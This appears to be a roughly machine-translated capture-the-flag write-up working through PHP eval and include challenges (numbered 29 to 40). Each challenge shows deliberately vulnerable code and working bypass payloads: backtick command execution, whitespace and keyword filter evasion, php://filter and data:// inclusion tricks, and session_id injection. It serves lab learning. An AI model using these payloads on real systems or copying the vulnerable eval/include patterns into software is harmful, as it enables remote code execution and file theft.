The school team assessment was beaten and shut down and rebuilt
29-36
29
<?php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
- Case filtered flag
- Self-constructed payload
echo `nl ????.???`; # 显示文本内容与行号
echo `tail ????.???`;# 只看文本的后几行
echo `cat ????.???`; # 从第一行开始显示文本内容
echo `more ????.???`; # 一页一页的显示文本内容
echo `less ????.???`; # 与 more 类似,但是比 more 更好的是,它可以往前翻页!
echo `head ????.???`; # 只看文本的前面几行
echo `tac ????.???`; # 从最后一行开始显示文本
echo `nl fla''g.php`;
echo `nl f*`;
- Other people's payload
c=eval($_GET[1])?>&1=system('cat flag.php');
c=?><?=echo `$_GET[1]`;&1=cat flag.php//查看源代码
to sum up:
- No filtering* and? When these two wildcard characters * represent 0 or more arbitrary characters? Match a character
- nl tail cat more less tac head seven commands can view files
- If only the flag cat is filtered, these complete strings can be bypassed by ``
- Calling the system function returns the return value of the function, such as 0 means correct execution, -1 execution error; at the same time, the result of the cmd command will be printed to the console interface;
- The backquote
directly returns the execution result of the cmd, but it will not be displayed on the screen.- I have thought of this method of nesting eval to construct a word Trojan horse, but I did not think of nesting eval tcl
- ?><?=This is a magical thing, set up an environment to show it by yourself
<?php
?>
<?='aaaaaaa'?>
- Visit the page will show aaaaaaa
<?=" is a short open tag of PHP and a shortcut usage of echo()
How to use this short tag, you must enable it from the settings
in the PHP.ini file . We need to find it in the PHP.ini file The following line and add (On) to turn it on,
30
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
- Case filters the content above
- The filtering system is just used, and the flag and php can still be bypassed by the above method
- Give a payload
echo `nl fl''ag.p''hp`;
31
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
- The main difference between this question and the previous one lies in the filtering. and space
- Own payload
echo`nl%09f*`;
?><?=`nl%09f*`;
?><?=`$_GET[1]`;&1=cat flag.php
eval($_GET[1])?>&1=system('cat flag.php');
eval($_GET[1]);&1=system('cat flag.php');
- Tips:
1. Compared with the previous questions, the test point is the filtering of spaces
2. The bypass method%09 ${IFS}, $IFS$9, <>, <
32
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
- A few more symbols are filtered compared to the previous
echo、`、;、( - Construct the payload:
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
- Originally replaced ?> with; it should be feasible eval must contain a complete PHP statement, but because; is filtered, you can only use ?>
- File inclusion and pseudo-protocol are used here to obtain flags, file inclusion loopholes are used, and the posture is increased.
33-36
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
- I'm a
"little bit puzzled by filtering - payload:
c=include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=flag.php
- You can use this to get the flag for up to 36 questions
37-44
37
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
- There is a file inclusion here, and the file inclusion vulnerability should be used to execute the command
- At first, I wanted to use the php://input pseudo-protocol to achieve command execution, but it failed. It turned out that there was a problem with my hackbar.
- payload:
?c=php://input hackbar POST传参<?php system('cat f*');?>
?c=data://text/plain,system('cat f*');?>
?c=data://text/plain,base64;PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==
The include (or require) statement will get all the text/code/marks existing in the specified file and copy it to the file using the include statement.
The data://text/plain in the pseudo protocol allows the user to control the input stream. When it is combined with the include function, the data:// stream entered by the user will be treated as a php file to execute
the php:/ in the pseudo protocol /input, the same principle
38
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag|php|file/i", $c)){
include($c);
echo $flag;
}
}else{
highlight_file(__FILE__);
}
-payload:
c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTs/Pg==
39
error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c.".php");
}
}else{
highlight_file(__FILE__);
}
- The flag is filtered here, and the suffix .php is added when the file is included.
- payload:
c=data://text/plain,<?php system('cat f*');?>
- Tip: data://text/plain, this is equivalent to executing a php statement. php Because the previous php statement has been closed, the following .php will be treated as an html page and displayed directly on the page, which has no effect
- I don't quite understand why php://input fails
- Wait to fix the pit
40
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
eval($c);
}
}else{
highlight_file(__FILE__);
}
- Filtered a bunch of things, filtered single quotes, $,`
- No idea, I watched wp
- payload
c=session_start();system(session_id());
- Capture the packet in
PHPSESSID=lsthis way, you can achieve the effect of command execution - Equivalent to system('ls');
Then change it directly to c=session_start();highlight_file(session_id()); and then change the value of PHPSESSID to flag.php and there is a problem.
After testing, it is found that 5.5-7.1.9 can be executed under the influence of php version, because session_id is specified as characters in 0-9, az, AZ, -. Below 5.5 and above 7.1, it is not possible to write other content. But the characters that meet the requirements are still possible.
Reprinted from Feather Big Brother
- Write the payload first highlight_file(next(array_reverse(scandir(pos(localeconv())))));
- Functions that need to be used
- localeconv(): Returns an array containing local number and currency format information. The first in the array is a dot (.)
- pos(): Returns the value of the current element in the array.
- array_reverse(): array reverse order
- scandir(): Get the files in the directory
- next(): The function points the internal pointer to the next element in the array and outputs it.
- First get the dot through pos(localeconv()), because scandir('.') means to get the files in the current directory, so
- scandir(pos(localeconv())) can get flag.php
- Reprinted from Feather